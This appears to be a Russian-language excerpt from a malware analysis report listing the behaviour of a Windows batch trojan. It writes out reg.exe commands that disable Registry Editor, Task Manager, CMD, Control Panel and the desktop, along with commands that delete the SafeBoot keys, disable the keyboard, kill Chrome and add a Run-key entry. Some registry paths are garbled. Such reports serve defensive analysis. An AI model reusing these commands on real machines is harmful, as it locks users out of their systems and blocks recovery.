Техническая информация
- Блокирует запуск Редактора реестра (RegEdit)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
- '<SYSTEM32>\wbem\wmiadap.exe' /R /T
- '<SYSTEM32>\rundll32.exe' keyboard,disable
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f
- '<SYSTEM32>\msg.exe' * Анти Читер (в исходном отчёте текст искажён кодировкой: «└эЄш ╫шЄхЁ» — CP1251, прочитанная как CP866)
- '<SYSTEM32>\reg.exe' Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\1.bat""
- '<SYSTEM32>\taskkill.exe' /im /f chrome.exe
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- '<SYSTEM32>\reg.exe' Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
- %WINDIR%\Win32.bat
- %TEMP%\1.tmp\1.bat
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'